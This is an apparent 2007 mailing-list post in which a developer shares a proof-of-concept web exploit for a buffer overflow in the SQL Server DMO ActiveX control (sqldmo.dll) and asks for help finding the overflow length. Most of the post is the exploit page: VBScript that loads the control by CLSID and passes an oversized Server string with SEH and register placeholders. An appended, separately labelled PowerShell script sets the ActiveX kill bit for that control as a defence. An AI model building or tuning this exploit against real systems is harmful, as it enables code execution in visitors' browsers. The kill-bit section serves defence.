[framework] Microsoft SQL Server Distributed Management Objects OLE DLL for
Manish Gupta
manish.gupta at ariosesoftware.com
Thu Sep 13 07:34:39 CDT 2007
Hi,
I am working on the "Microsoft SQL Server Distributed Management Objects OLE DLL
for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" vulnerability,
whose exploit is:
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer'
/></object>
<script language='vbscript'>
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )"
memberName = "Start"
progid = "SQLDMO.SQLServer"
argCount = 4
'edx = ecx
edx ="bb"
seh ="aa"
StartMode =True
Server
="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\te
s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\
\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\
test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx
+
"nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR
R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC
C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#
$%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff
fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login ="aaaaaaaa"
Password ="bbbbbbbb"
SQLServer.Start StartMode ,Server ,Login ,Password
</script>
</html>
I am not able to find the Server length, so please help me.
Server
="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\te
s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\
\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\
test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx
+
"nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR
R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC
C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#
$%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff
fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
\\
Regards
Manish Gupta
Ariose Software
Noida (U.P)
Mbl:-+91-9891650667
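Added example, not part of the post above: the defensive counterpart to this PoC is to set the ActiveX "kill bit" for the SQLDMO.SQLServer control so Internet Explorer refuses to instantiate the CLSID from a web page. The registry key and the 0x400 Compatibility Flags value are Microsoft's documented kill-bit mechanism; the CLSID is the one from the PoC, and the script assumes it is run elevated.

```powershell
# Query and optionally set the ActiveX kill bit for a CLSID.
# Default CLSID is the SQLDMO.SQLServer control from the PoC (constructed example script).
param(
    [string]$Clsid = '{10020200-E260-11CF-AE68-00AA004A34D5}',
    [switch]$Set
)

$KillBit = 0x400   # COMPAT_FLAG "kill bit" in Compatibility Flags
$Key = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

function Get-KillBitState {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return 'absent' }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return 'absent' }
    if (($flags -band $KillBit) -ne 0) { return 'set' }
    return 'clear'
}

$state = Get-KillBitState -Path $Key
Write-Output "Kill bit for $Clsid is $state"

if ($Set -and $state -ne 'set') {
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    # Keep any flags already present and OR in the kill bit.
    $existing = (Get-ItemProperty -Path $Key -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    Set-ItemProperty -Path $Key -Name 'Compatibility Flags' -Type DWord `
                     -Value ($existing -bor $KillBit)
    Write-Output "Kill bit for $Clsid is now $(Get-KillBitState -Path $Key)"
}
```

On 64-bit Windows, 32-bit Internet Explorer reads the same key under HKLM:\SOFTWARE\Wow6432Node\..., so apply the setting there as well.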